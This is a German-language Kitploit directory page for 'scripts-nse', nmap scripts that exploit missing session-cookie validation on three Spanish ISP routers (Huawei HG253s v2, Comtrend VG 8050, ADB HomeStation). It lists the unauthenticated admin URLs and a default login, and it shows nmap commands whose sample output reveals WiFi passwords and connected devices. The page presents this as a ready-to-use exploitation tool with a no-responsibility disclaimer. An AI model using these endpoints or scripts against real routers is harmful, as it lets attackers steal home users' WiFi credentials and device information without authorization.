Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
scripts-nse — Einige NSE-Skripte zum Suchen von Informationen von Routern | Kitploit
Tools/GitHubGitHub/danilabs/scripts-nse
AufklärungSchwachstellenscannerExploitationInformationsbeschaffungWebsicherheitNetzwerksicherheitPenetrationstests
GitHubdanilabs/scripts-nse

scripts-nse

Einige NSE-Skripte zum Suchen von Informationen von Routern

Repository anzeigen
3626vor 10 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Was ist das?

Einige NSE-Skripte, um Informationen von Routern abzurufen.

Der Autor dieser Skripte ist VicenDominguez. Er hat die 0-Day-Lücke bei Huawei entdeckt; ich habe sie nur für zwei andere modifiziert.

Der Autor dieses Skripts ist nicht für dessen Verwendung verantwortlich.

#Huawei HG253s v2 Vodafone-Spanien beginnt, einen neuen Huawei HG253v2-Router an spanische Kunden zu vermieten. Dieser neue Router wird mit einer neuen Firmware-Version ausgeliefert.

##Schwachstelle Grundsätzlich wird das Session-Cookie auf einigen Administrations-Webseiten nicht validiert. Daher ist es möglich, von diesen URLs direkte Informationen von jedem Router zu erhalten, der mit dem Internet verbunden ist.

  • http://IPhtml_253s/api/ntwk/WlanBasic
  • http://IP/html_253s/api/system/diagnose_internet
  • http://IP/html_253s/api/system/hostinfo?type=ethhost
  • http://IP/html_253s/api/system/hostinfo?type=guesthost
  • http://IP/html_253s/api/system/hostinfo?type=homehost
  • http://IP/html_253s/api/system/hostinfo?type=wifihost
  • http://IP/html_253s/api/system/wizardcfg

##Verwendung

root@kitploit:~
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s: 
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX

#Comtrend VG 8050 Telefonica-Spanien beginnt, einen neuen Comtrend VG 8050-Router an spanische Kunden zu vermieten. Dieser neue Router wird mit einer neuen Firmware-Version ausgeliefert. Dieser Fehler wurde von DaniLabs gefunden.

##Schwachstelle Grundsätzlich wird das Session-Cookie auf einigen Administrations-Webseiten nicht validiert. Daher ist es möglich, von diesen URLs direkte Informationen von jedem Router zu erhalten, der mit dem Internet verbunden ist.

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

##Verwendung

root@kitploit:~
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-comtrend-vg-8050: 
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP: 
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2: 
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

#ADB P.DGA4001N a.k.a HomeStation Telefonica-Spanien beginnt, einen neuen ADB P.DGA4001N-Router an spanische Kunden zu vermieten. Dieser neue Router wird mit einer neuen Firmware-Version ausgeliefert. Dieser Fehler wurde von DaniLabs gefunden.

##Schwachstelle Grundsätzlich wird das Session-Cookie auf einigen Administrations-Webseiten nicht validiert. Daher ist es möglich, von diesen URLs direkte Informationen von jedem Router zu erhalten, der mit dem Internet verbunden ist.

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

Die Standard-Zugangsdaten sind admin / 1234. ##Verwendung

root@kitploit:~
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-homestation: 
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

Tool herunterladen